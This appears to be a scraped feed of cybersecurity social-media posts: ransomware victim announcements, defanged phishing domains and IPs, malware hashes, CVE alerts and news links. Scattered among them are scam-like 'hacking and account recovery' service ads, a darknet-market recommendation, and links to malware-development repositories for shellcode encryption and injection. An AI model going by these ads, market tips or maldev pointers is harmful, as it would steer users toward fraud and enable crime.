UnitedHealth Took $872M Hit From Change Cyberattack decipher.sc/change-healthcar… #decipher #deciphersec -- DecipherSec
New research:SoumniBot: the new Android banker’s unique techniques 👉 kas.pr/i1sq -- e_kaspersky
Hacktivist group the anonymous Bangladesh is likely to target India with a potential cyber attack. The group was seen targeting Jordan for past few days. #Cyberattack #India #Cti #DDoS -- FalconFeedsio
Ciphbit #ransomware group has added TrueNet Communications (truenetcommunications.com) to their victim list.#USA#Ciphbit #cti #cyberattack #darkweb #databreach -- FalconFeedsio
Cactus #ransomware group has added DRM, Inc.(drmarbys.com) to their victim list.#USA#Cactus #cti #cyberattack #darkweb #databreach -- FalconFeedsio
NoName continues to targets Poland. Today marks the 7th day of the attack. - e-Toll- pks.pl- Gdańsk Transport Company- PKS Polonus#Poland#ddos #cyberattack #cti #threatintel -- FalconFeedsio
LockBit #ransomware group has added Rehab Group (rehab.ie) to their victim list.#Ireland#lockbit #cti #cyberattack #darkweb #databreach -- FalconFeedsio
BianLian #ransomware group has added 2 new victims to their #darkweb portal. - Len Dubois Trucking 🇨🇦 - Pioneer Oil Company 🇺🇸#Canada#USA#BianLian #darkweb #databreach #cyberattack #cti -- FalconFeedsio
RansomHouse #ransomware group has added Lopesan Hotels (lopesan.com) to their victim list. #Spain#ransomhouse #databreach #darkweb #cyberattack #cti -- FalconFeedsio
RansomHub #ransomware group has added Empresa de Energía Del Bajo Putumayo (eebpsa.com.co) to their victim list.#Colombia#RansomHub #cyberattack #darkweb #databreach -- FalconFeedsio
BLACK SUIT #ransomware group has added 2 new victims to their #darkweb portal. - UPC Technology 🇹🇼- D&V Electronics 🇨🇦#Taiwan#Canada#blacksuit #databreach #cyberattack #cti -- FalconFeedsio
8/x@victor_ruiz @capitan_raul @cynsol @rleon_mx -- n4hualH
7/x Finalmente, al momento de escribir esto, la lista de credenciales ha sido bajada 4 veces.Por lo tanto, sí, dicha información está comenzando a ser de interés. -- n4hualH
SHARPIL RAT177a73014d3c3455d71d645c1bf32a9f#SHARPILRAT #RAT #IOC -- suyog41
There is also some discussion surrounding 'private' Discords being scraped. Unfortunately, most 'administrators' of 'private' Discords leave the front door wide open (Discord invite links that never expire) – coupled with no channel roles, leaving everyth -- vxunderground
It should be noted that some of your favorite Cyber Threat Intelligence companies do mass data aggregation from Discord for a wide variety of customers.Maybe it's just an open secret? ¯\_(ツ)_/¯ -- vxunderground
We've witnessed a significant spike in people discussing the 'spy tool' which collects and aggregates Discord conversation en masse.This service has existed for awhile and is not the first organization who does this type of data collections.tl;dr talking -- vxunderground
ok we found it here:all credit goes to him or whoever idk -- vxunderground
babe wake up mandiant just released artwork for sandworm aka apt44 (officially) -- vxunderground
Today a group named 66slavs claimed to have breached the United States National Energy Research Scientific Computing Center (NERSC).* We have not reviewed the data* Yes, they watermarked a data breach -- vxunderground
We are thrilled to have received the #Cybersecurity #Distribution Excellence Award at the Future Security Awards 2024 in #Riyadh yesterday. This achievement wouldn't have been possible without the support of our #technology partners and the dedication of -- ami_viz
2024/04/20 08:54#イオンカード #フィッシングメール #Phishing ◆件名5月ご請求額のお知らせ◆リンクaeno[.]co[.]jp.yidahudong[.]com/aeon◆IP 150.109.196[.]190 #Tencent -- catnap707
New Ransomware Rankings and Darknet Market Rankings are released. Cypher Market has been removed as they are exit scamming. #Ransomware #DarkWeb #DarkWebInformer #Cybersecurity #Cyberattack #Cybercrime #CTI #Darknet #OSINT #LockBit #PLAY #hunters #Archety -- DarkWebInformer
Worried that your Sirius XM subscription expired because they couldn't renew your card? Beware, that email's a scam: Spammers are trying to steal your credit card info. Here's how you can tell... askdavetaylor.com/your-siriu… #siriusxm #spam #scams #phish -- DaveTaylor
🚨Major Threat Alert: BlackTech Targets Tech, Research, and Gov Sectors New 'Deuterbear' Tool - #BlackTechChatter: ⚠️ CriticalMaturity: 💥 Mainstreamfletch.ai/p/blacktech#CyberSecurity #ThreatIntel #InfoSec -- fletch_ai
-ランサムウェア攻撃 アラート-公開日時: 2024-04-20被害企業: ​eurosko.​com​ランサムグループ: lockbit3#Cybersecurity #サイバーセキュリティ #Ransomware #ランサムウェア1713579012 -- IntelVictims
Global police agencies take down massive scam website that defrauded thousands of victims. (CNBC) #Phishing #CyberAttack #CyberCrime #Data #Privacy buff.ly/3U3os4G -- jamesvgingerich
New Threat: Scattered Spider International Coalition of Hackers bit.ly/4aD9tW1 #hackers #russia #china #cybersecurity @CNMF_CyberAlert -- natlawreview
#Android #PlayStore #Trojan #Malware@malwrhunterteam @cryptax@Cyber_O51NT @bl4ckh0l3z@JAMESWT_MHT @500mk500@ni_fi_70 @GooglePlay#Joker Trojan on Google Play :play.google.com/store/apps/d…Md5: d618d94eb53325300578b0d364e2c216 -- ReBensk
#Android #PlayStore #Trojan #Malware@malwrhunterteam @cryptax@Cyber_O51NT @bl4ckh0l3z@JAMESWT_MHT @500mk500@ni_fi_70 @GooglePlay#Joker Trojan on Google Play :play.google.com/store/apps/d…Md5: 471301d19bdf21da98a096b988817c61 -- ReBensk
#Android #PlayStore #Trojan #Malware@malwrhunterteam @cryptax@Cyber_O51NT @bl4ckh0l3z@JAMESWT_MHT @500mk500@ni_fi_70 @GooglePlay#Joker Trojan on Google Play :play.google.com/store/apps/d…Md5: 4f4f101c1e268f3e3542b758b3c56c92 -- ReBensk
#Android #PlayStore #Trojan #Malware@malwrhunterteam @cryptax@Cyber_O51NT @bl4ckh0l3z@JAMESWT_MHT @500mk500@ni_fi_70 @GooglePlay#Harly Trojan on Google Play :play.google.com/store/apps/d…Md5: e218b415db2e619a9d4436eb96d10e02 -- ReBensk
I retrieve all Hacked Snapchat inbox now for guide on how to recover your Account#hacking #snapchatdown #5G #icloud #SNAPCHATLEAKED#phishing #Phish #Hackedgmail #hackedinstagram -- smith_john003
#Five #Australians #among #37 #arrested #OVER #Global #phishing #scam #following #international #investigationabc.net.au/news/2024-04-18/f… -- thezigzag3
☆꧁Report Cases your safety is secured 100% ꧂☆ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware #TargetedIndividuals #reels #personality #me #happy #win #love #laugh #try -- zedel_control
📢Just 40 days to submit your talk at BSides Edmonton cc @bsidesedmonton! cfptime.org/cfps/1806/ #cfp #infosec #bsidesedmonton -- cfp_time
📢Just 40 days to submit your talk at RomHack cc @cybersaiyanIT! cfptime.org/cfps/1780/ #cfp #infosec #cybersaiyanIT -- cfp_time
📢Just 40 days to submit your talk at 44CON cc @44con! cfptime.org/cfps/1778/ #cfp #infosec #44con -- cfp_time
"Hacker group Anonymous claims to have broken into IDF and obtained a quarter of a million documents. The group plans to showcase the purported breach. #Anonymous #IDF #Cybersecurity"ift.tt/LMnckhS -- Cyber_O51NT
#USA 🇺🇸 - LockBit #ransomware group has announced Call 4 Health on the victim list"Call 4 Health is a leading medical call center and nurse triage service with a genuine understanding of the patient's perspective."#DarkWeb #healthcare -- DailyDarkWeb
CVE-2024-3400 playing everyone right now. #DarkWebInformer #DarkWeb #Cybersecurity #Cybercrime #Infosec #CTI #Meme #CVE20243400 -- DarkWebInformer
⚠️#BREAKING Allegedly, #RansomHub has named a new victim.#Ransomware #DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Malware #Infosec #CTICountry: #USA🇺🇸Threat Actor: RansomHubCompany: CYNC SolutionsIndustry: Business ServicesRevenue: < -- DarkWebInformer
🚨URGENT🚨A Zero-day exploit for WhatsApp is up for sale.#DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Infosec #CTI #0Day #ZeroDay #WhatsApp #Exploit Details: - Supports #Android and iOS - RCE- Attack type - 1Click- Payload - Image  - C -- DarkWebInformer
⚠️#BREAKING Allegedly, #LockBit has named multiple victims.#Ransomware #DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Malware #Infosec #CTIThreat Actor: LockBitRansomware Victim: 2 VictimsDate: 2024-04-20 -- DarkWebInformer
⚠️DATA BREACH⚠️Threat actor, WIFI, allegedly has breached Honda Vietnam🇻🇳. @Honda#Clearnet #DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Infosec #CTI #HondaCompromised data: Number HEAD Code Customer Code Model Full name ID card/CCCD -- DarkWebInformer
If your Roblox is hacked, all hacking services are available to me Inbox me 24/7 at your service #hacking #recovery #robloxdown #hack #cybersecurity -- Geekcore_cyber
Estoy disponible 24/78 inbox me #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #ransomware #alterworld -- IamTechincal
Eu recupero todas as caixas de entrada hackeadas do Snapchat agora para obter um guia sobre como recuperar sua conta #hacking #snapchatdown #5G #icloud #SNAPCHATLEAKED#phishing #Phish #Hackedgmail #hackedinstagram -- IamTechincal
#workfromhome #scam #cybersecurity -- KolkataPolice
Nuevo sitio de #phishing de @mercadopago registrado el 14/04/2014 (ya reportado)Solicita que nos comuniquemos a un WA (falso). -- SeguInfo
Akira #ransomware group has extorted approximately $42 MILLION from over 250 global victims. It is now expanding its reach to target #Linux, and VMware ESXi systems.Read: thehackernews.com/2024/04/ak…#hacking #infosec -- TheHackersNews
FREE AI Courses- mltut.com/best-free-online-c…@KirkDBorne#MachineLearning #100DaysOfCode #100DaysOfMLCode #Python #javascript #womenwhocode #cybersecurity #CodeNewbie #DataScience #DEVCommunity #BigData #Analytics #pythonprogramming #PowerBI #SQL #GenAI # -- tut_ml
🔒 Beware of phishing attacks on your iPhone! Hackers are using cunning techniques to trick users into revealing sensitive information. Stay alert and protect your device! #CyberSecurity #Phishing #iPhoneSafety #aimnxt -- aimnxt39393
Following the first part of the #APT29 #NOBELIUM attack, I am picking up from where we last off in the first part, shedding light on the latter components of the #malware infection chain and going through each in-depth.Your feedback is appreciated:)blu3ey -- BlueEye46572843
Elevate your career in network security #elysiumacademy #jobassurance #tesbo #no1trainingacademy #cybersecurity #ethicalhacking #hackers #programming #hack #technology #security #coding #tech #ethicalhacker #pentesting #cyber #malware #programmer #informa -- elysiumacademy
🚨Major Threat Alert: Microsoft finds Kubernetes clusters targeted by OpenMetadata exploits - #CVE-2024-28253CVE-2024-28255CVE-2024-28847CVE-2024-28253CVE-2024-28848Chatter: ⚠️ CriticalMaturity: 💥 Mainstreamfletch.ai/p/cve-2024-28253#CyberSecurity #ThreatI -- fletch_ai
🚨Major Threat Alert: Several botnets set sights on vulnerable TP-Link routers - #CVE-2023-1389CVE-2023-1389Chatter: 🔴 HighMaturity: 💥 Mainstreamfletch.ai/p/cve-2023-1389#CyberSecurity #ThreatIntel #InfoSec -- fletch_ai
DM ahora #coins #btc  #Bitcoin  #Bitcoin  inbox ahora para todos los servicios de recuperación de cuentas, perdidos o suspendidos, inbox ahora #phishing #phish #hacked #iloud #facebookdown #imessage #ransomware #snapchat # #whatsapp -- Geekcore_cyber
e cómo recuperar tu cuenta #Hacking #snapchatdown #5g #icloud #snapchatleaked #phishing #phish #phish #hackedgmail #hackedinstagram Si tu cuenta está pirateada, o tu cuenta está siendo templada, todo lo que necesitas es un buen hacker.. -- Geekcore_cyber
envíame un mensaje de texto para cualquier piratería o bypass activo 24/7 #anyomous #sadapwhatsapphack #hackinstagrammurah #facebook #hackerstayaway #hackingout #accounthacking #mobilehacking #hackgmail #hacksnapchat #blackhathacker #hackerindia #phishing -- Geekcore_cyber
envíame un mensaje de texto para cualquier piratería o bypass activo 24/7 #anyomous #sadapwhatsapphack #hackinstagrammurah #facebook #hackerstayaway #hackingout #accounthacking #mobilehacking #hackgmail #hacksnapchat #blackhathacker #hackerindia #phishing -- Geekcore_cyber
Offering the best recovery services.All social media accounts hacking, Infiltration, and recovery.#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #hacked #coinbasesupport #wal -- GodsentFirm
estou online 24/78 Mande-me um email #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #Lockedaccount #metamask #ransomware #alterworld -- HACKER_MADOXX
أنا متواجد 24/78 أرسل لي بريدا الكترونيا #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown # Lockedaccount #metamask #ransomware #alterworld -- HACKER_MADOXX
أرسل لي بريدا الكترونيا #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask #ransomware #alterworld إذا كنت بحاجة إلى مساعدة في استعادة أي حساب تم اختراقه أو رسائل بريد إلكتروني أو Tiktok أو Snapchat أو Instagram وما إلى -- HACKER_MADOXX
Vijf Nederlanders opgepakt in internationaal onderzoek naar phishingbende nu.nl/tech/6309502/vijf-nede… #phishing #cybersecurity #awareness -- HighFiveLearn
The Best Business VPN in 2024- The best VPN for business protects your company from online threats and allows limitless access following a one-time payment.businesspartnermagazine.com/…#VPN #DataSecurity #CyberSecurity -- Hinshelwood_S
How to Protect Water Systems Against Cyber Attack  Governing dlvr.it/T5jD3G #SecurityInsights #CyberSecurity #InfoSec -- iSecurity
Phish just shredding the first song at the @SphereVegas@phish #phishing -- Jackson_87_MLB
Is httpx working correctly?I just installed it and it doesn't correspond to any flag that I use #bugbountytip , #Nahamsec, #GodfatherOrwa,#infosec -- kenneth__OS
Want to decrypt a social media message to prank your friend? Dm for a professional exclusive and confidential service #hackattack #hacker #darkweb #darkwebuser #incognito #phishing#roblox -- kenstarbreach_
#Phishing #SMBC #SMCC #三井住友カード IP:89.187.28.238(AS 396356 / LATITUDE-SH )hxxps://365xinfu.comhxxps://ahxituo.comhxxps://alibbe.comhxxps://fdayxj.comhxxps://tlpifa.comhxxps://www.smbcsupport.world -- KesaGataMe0
三菱UFJ銀行のフィッシングサイト情報です⚠hxxps://www.adyilian.comhxxps://www.hydlist.comip: 43.163.229.30 (AS132203 - Tencent)Registrar: GnameScan Log:urlscan.io/result/95882f11-b…urlscan.io/result/1942a350-d…#Phishing #MUFG #三菱UFJ銀行 -- kubotaa3
#Phishing #住信SBIネット銀行hxxps://netbk.co-contents.nfgyto.cnhxxps://netbk.co-contents.wnndktr.cnhxxps://netbk.co-contents.wpsmjw.cnip: 134.122.186.134  (AS152194 - BGPNET Global ASN)Scan Log:urlscan.io/result/3594d3fc-8…urlscan.io/result/61eaf4e7-5…urlscan.io -- kubotaa3
"American telecom provider Frontier Communications is restoring systems after a cybercrime group breached some of its IT systems in a recent cyberattack."+ info 🔗: bleepingcomputer.com/news/se…#offensivesecurity #pentest #redteam #cybersecurity #cybernews -- OpenSec
“Totally Unexpected” Package Malware Using Modified Notepad++ Plug-in (WikiLoader) asec.ahnlab.com/en/64106/ #Pentesting #Malware #CyberSecurity #Infosec -- ptracesecurity
Palo Alto Products Remote Code Execution Vulnerability - redpacketsecurity.com/palo-a…#threatintel -- RedPacketSec
Another #Phishing #Patent Granted 2 days ago.I got more than few dozens on #phishing #cybersecurity #ztna #vishing #smishing #insiderthreat #credentialharvesting #zerotrust Every night, build and cultivate your #skillpower #brainpowerKeep Rocketing!#Rocke -- RocketSikh
By assuming nothing can be trusted, zero trust and robust authentication help address the limitations of traditional perimeter-based security models. thenewstack.io/why-you-shoul… #CyberSecurity #API #APIsecurity @ambassadorlabs -- thenewstack
🚨 Alerta @GobiernoMS_ 🇪🇨Desde el 09 de abril de 2024, se ha detectado una campaña de #phishing desde mail.gpms.gob[.]ec. Los mensajes fraudulentos están siendo enviados con el siguiente asunto: "Re: aviso de último año"y contienen el siguiente texto:"Cerr -- V3n0mStrike
Traditional SD-WANs are vulnerable to lateral #threat movement. The #Zscaler Zero Trust SD-WAN minimises both overheads and #ransomware risks. In this blog, Jay Chaudhry explains why #ZeroTrust solutions will replace SD-WANs. Check it out👉 spklr.io/6012oZ -- zscaler
Advanced #cybersecurity performance translates to higher shareholder returns bit.ly/3UgHS7w via @SecurityHIT #healthcare -- Derek_Griffin1
OSI Reference Model#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips -- hackinarticles
IPv4 vs IPv6#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips -- hackinarticles
【SecurityNext】開示したNPO法人事業報告書で墨塗り漏れが判明 - 山口県 #cybersecurity #security #news security-next.com/156089 -- IT_security_bot
Protect all family devices seamlessly with Quick Heal! Safeguard Windows PC, Mac, and Android with one product key for comprehensive security. Ensure your loved ones' safety today! kaspen.in#kaspen #business #QuickHeal #cyberSecurity #antivirusprotection -- ItKaspen
From choosing secure connections to handling suspicious links and using strong passwords, discover what influences your #cybersecurity habits the most.Read our full report ⇒ kas.pr/97vf -- kaspersky
Watch #GoogleCloudConsulting VP Lee Moore on Bloomberg TV sharing the new #GoogleCloudCertificate program and courses in gen AI, #cybersecurity, and #DataAnalytics that expand onramps to economic opportunity with colleges, universities, & employers💡 googl -- larsdominic
Join us at #GISECGLOBAL, April 23-25, in Dubai! Explore the largest #cybersecurity expo in the Middle East & Africa with @QseapInfotech. Don’t miss out on 300+ hours of insights from global leaders, networking with attendees & 750+ brands. DM us to meet u -- QseapInfotech
#Malware#CyberAttack#ThreatIntel@hasherezade@JusticeRage@Nima__Nikjoo@lauriewired@herrcore@vxunderground@MalwareHuntress@embee_research@HuskyHacksMK@onlymalware@kucher1n@kaspersky@SentinelOne@MalFuzzer@AnFam17@Unit42_Intel@harfanglab -- BlueEye46572843
🚨URGENT🚨A Zero-day LPE exploit for Windows is up for sale.#DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Infosec #CTI #0Day #ZeroDay #Windows #ExploitPrice: $250,000Threat Actor note: The exploit isn't related to any CVE without PoC -- DarkWebInformer
Cactus #ransomware group has added XD Connects (xdconnects.com) to their victim list.#Netherlands#Cactus #cti #cyberattack #darkweb #databreach -- FalconFeedsio
🚨Major Threat Alert: FBI: Akira ransomware raked in $42 million from 250+ victims - #AkiraChatter: 🔴 HighMaturity: 💥 Mainstreamfletch.ai/p/akira#CyberSecurity #ThreatIntel #InfoSec -- fletch_ai
Security researchers reveal spear-phishing campaign targeting the IT department in a US automaker#cybersecurity #threatintel #autoindustry #USAblogs.blackberry.com/en/2024… -- rfwaveio
🚨ALERT🚨Frontier Communications Parent, Inc. has filed form 8-K due to a cybersecurity incident.#Ransomware #DarkWebInformer #DarkWeb #Cybersecurity #Cyberattack #Cybercrime #Malware #Infosec #CTIThe notice states:On April 14, 2024, Frontier Communications -- DarkWebInformer
Hacking is a lot easier when you connect with the right hacker. Get All Your Hacking Services Inbox Now I'm always available 24/7 #hacked #icloud #imessage #facebookdown #ransomware #missingphone👾👾 #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #r -- Geekcore_cyber
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #RansomwareGroup#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagr -- Geekcore_cyber
DM for quick recovery.Available 24/7.#gmailhack#gmaildown #hacked #Hacking #hackaccount#hacked #facebookdown #WhatsApp #hackedinstagram #TwitterDown #lockedaccount #metamask #RansomwareGroup#phishing #Phish #Hackedgmail #Hacked #Hackingtime #hackedinstagr -- Geekcore_cyber
XZ Utils バックドア騒動:ソフトウェア・セキュリティの問題点が浮き彫りにiototsecnews.jp/2024/04/11/x…#CVE20243094 #CyberAttack #Exploit #HarvardBusinessSchool #Linux #Malware #OpenSource #RAT #Tidelift #TTP #Vulnerability #XZUtils -- iototsecnews
Offering the best recovery services.All social media accounts hacking, Infiltration and recovery.#hackedinstagram #TwitterDown #lockedaccount #metamask #ransomware#gmailhack #gmaildown #hacked #Hacking #hackaccount #Facebook #hacked #coinbasesupport #wall -- kenstarbreach_
Is mandatory password expiration helping or hurting your password security?🧨bit.ly/3UZnwhl#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- kenstarbreach_
8 strange ways employees can (accidently) expose data📌bit.ly/3M633Dj#DataSecurity #Privacy #100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity#CyberAttack #DataProtection #DataBreach #Hacked #Infosec -- kenstarbreach_
強制密碼過期還有利於破壞您的密碼安全嗎? #DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- kenstarbreach_
#Phishing #Apple #AppleID IP:69.176.95.36(AS 64050 / BGPNET Global ASN )hxxps://idaoesyb.cc -- KesaGataMe0
#Phishing #Apple #AppleID hxxps://idpeen.com(AS13335 - CLOUDFLARENET) -- KesaGataMe0
#PeckShieldAlert #Phishing An address 0x71ac...c913 has fallen victim to a phishing attack, resulting in a loss of 190.26K $MAGIC (worth ~$143.2K) #PinkDrainer #Arbitrum -- PeckShieldAlert
If you need help recovering any account, emails, Tiktok, Snapchat, Instagram etc. I'm available 24/7 Send me an inbox #hacked#facebookdown #whatsapp#hackedinstagram#twitterdown #lockedaccount#metamask #ransomware -- shawcracks
I will be hosting a session on Crossroads of AppSec and genAI at the University of Chicago on May 15th/16th#Domino24#cybersecurity#Veracode -- Siqbal00
Global sting sees #Australian offenders arrested for #cybercrime and #phishing attacks@dramitsarwal @Pallavi_Aus @ShailendraBSing @opdwivedi82 @AusFedPolice Read here: theaustraliatoday.com.au/glo… -- TheAusToday
PeckShieldAlert: #PeckShieldAlert #Phishing An address 0x71ac...c913 has fallen victim to a phishing attack, resulting in a loss of 190.26K $MAGIC (worth ~$143.2K) #PinkDrainer #Arbitrum -- web3_watchdog
Malware Development Series => [+] Rc4 Shellcode Encryption: github.com/Whitecat18/Rust-f…[+] Rc4 Encrypted Shellcode Execution: github.com/Whitecat18/Rust-f…[+] Fixed APC Injection: github.com/Whitecat18/Rust-f…#maldev #rust #redteam #cybersecurity #infos -- 5mukx
#IdentityBridge serves as the ultimate integrator, bridging gap between various apps & databases. It fortifies organizations against threats, safeguarding sensitive data, while prioritizing seamless access for end-users. bit.ly/485RyWB#ITSecurity #Cyberse -- avancercorp
"Today we introduced the most consequential security product in Cisco’s history." 📢 Learn about #CiscoHypershield – Security for the age of AI from EVP and GM, Security and Collaboration @jpatel41 🛡️➡️ cs.co/6013bJpnZ@CiscoSecure | #cybersecurity -- Cisco
In 2023 @Cybersixgill detected an 88% increase in compromised endpoints and a 17% increase in compromised domains for sale vs. 2022. 😱🤔Wondering what this means for your organization? Find out!👉 hubs.ly/Q02tq5XR0 #cybersecurity #cybercrime #threatintel -- Cybersixgill
Looking for assets in the AWS IP range?Try awsScrape, a tool designed to scrape certificates across all AWS IP ranges and search for custom keywords.github.com/jhaddix/awsScrape#OSINT #CTI #investigation #intelligence #infosec #reconnaissance -- DailyOsint
🚨EXIT SCAM🚨Cypher Market is exit scamming. DO NOT use it. New Darknet Market rankings will be out tomorrow. If you use Darknet Markets, stick to Archetyp. #CTI #Darknet #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Cypher #Archetyp #OSINT #Infos -- DarkWebInformer
⚠️POLL⚠️Do you use Darknet Markets? This is specially if you use them as a buyer or vendor.. NOT research. #Clearnet #DarkWebInformer #DarkWeb #Darknet #Cyberattack #Cybercrime #Infosec #CTI -- DarkWebInformer
🚨PoC ALERT🚨This PoC creator is only 13 years old.#Clearnet #DarkWebInformer #DarkWeb #Exploit #PoC #Cyberattack #Cybercrime #PasteBomb #Infosec #CTIPasteBomb is a simple, yet powerful, remote administration Trojan (RAT) that allows you to execute terminal -- DarkWebInformer
⚠️NOT EVIL⚠️This is 'Not Evil'. Not Evil is a no ad Onion search engine that is simple and provides good results.#CTI #Darknet #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Cyberattack #OSINT #Infosec #NotEvilHave an Onion: notevilmtxf25uw7tskqxj6 -- DarkWebInformer
Navigating the cyber landscape? Threat Exposure Management is key to identifying vulnerabilities before they're exploited, ensuring your systems stay robust & resilient. Stay ahead of threats with the right strategies! #CyberSecurity #ThreatManagement #Ri -- JCorcione
Is mandatory password expiration helping or hurting your password security?#phishing #Windows #icloud #ios#AndreaBrillantes #manifestation #HackedAccount -- kenstarbreach_
Is mandatory password expiration helping or hurting your password security?#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- kenstarbreach_
Is mandatory password expiration helping or hurting your password security?#DataSecurity #Privacy#100DaysOfCode #CloudSecurity#MachineLearning #Phishing #Ransomware #Cybersecurity #CyberAttack #DataProtection#DataBreach #Hacked #Infosec -- kenstarbreach_
"Target Locked: Operation Sharpshooter" published by AttackIQ. #Sharpshooter, #CTI, #OSINT, #LAZARUS attackiq.com/2024/04/17/oper… -- lazarusholic
🚨 Explore the rising threat of cyberattacks leveraging System Center Configuration Manager (SCCM) in our newest blog post. Gain expert insights and learn how to protect your organization. Read now: bit.ly/4aIxhrS#Cybersecurity #SCCM -- Mandiant
Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled. github.com/hakaioffsec/CVE-2… #Pentesting #Windows #CyberSecurity #Infosec -- ptracesecurity
Understanding #Ransomware Attacks, Its Origin and Impact #technodized #thetechnodized #technology technodized.com/security/ran… #Cybersecurity -- thetechnodized
📢 #Yeti is now part of the ODFIR infrastructure automation project! It's never been easier to connect it to a @TimesketchProj instance and enrich all your sketches with juicy forensics intelligence ✨ More details here 👇🏻osdfir.blogspot.com/2024/04/…#DFIR -- tomchop_
Hoe bescherm je je privacy in het digitale tijdperk: een gids trendingtech.news/trending-n… #Privacybescherming digitaal #veilige wachtwoorden #tweestapsverificatie #beveiligingssoftware #phishing-aanvallen #Trending #Tech #Nieuws -- TrendingNewsBot
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
꧁Specialized in all recovery/disabled accounts, Web3 developer, Spy 🕵️‍♂️|Private Investigation, TI's, Crypto recovery꧂ #spam #elsed #bist100 #hisse #dizipal #astor #borsa #zagabet #rinabet #privacy #yrkkh #naagin #infosec #hackathon #kalilinux #malware # -- Andrewlambs1
I'm available 24/7 by email if you require assistance retrieving any accounts, emails, Tiktok videos, Snapchat, Instagram, or other data.#hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #hacking #ransomware #snapchat #snapchats -- CYBER_CAS
I'm available 24/7 by email if you require assistance retrieving any accounts, emails, Tiktok videos, Snapchat, Instagram, or other data.#hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #hacking #ransomware #snapchat #snapchats -- CYBER_CAS
Cyber Fusion Centers serve as a linchpin in fortifying cyber defense mechanisms and streamlining operational efficiency. In his @Finextra article, Cyware CEO Anuj Goel shares important use cases that benefit financial institutions.bit.ly/49Ii095#CTI #SOAR -- CywareCo
Great work by police to help bust a global #phishing scam. Everyday Australians are duped out of their hard earned savings by scammers. Whilst a small win, it’s a symbol of hope in finding and arresting #scammers #cybersecurity abc.net.au/news/2024-04-18/ -- imcallingyouou2
-ランサムウェア攻撃 アラート-公開日時: 2024-04-18被害企業: ​Doyon​ランサムグループ: blackbasta#Cybersecurity #サイバーセキュリティ #Ransomware #ランサムウェア1713406201 -- IntelVictims
